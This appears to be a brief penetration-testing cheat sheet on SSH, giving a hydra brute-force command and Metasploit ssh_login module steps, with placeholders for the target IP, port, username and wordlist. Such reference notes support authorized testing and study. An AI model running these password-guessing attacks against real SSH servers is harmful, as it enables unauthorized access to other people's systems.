SSH

Methodology

Enumeration

Useful

Brute force

hydra

hydra -L root -P <wordlist> ssh://<ip>:<port> -t 4 -V 

Metasploit

search ssh
ssh_login
set RHOSTS <target ip>
set RPORT <target port>
set username <username>
set pass_file <wordlist>
run

Last updated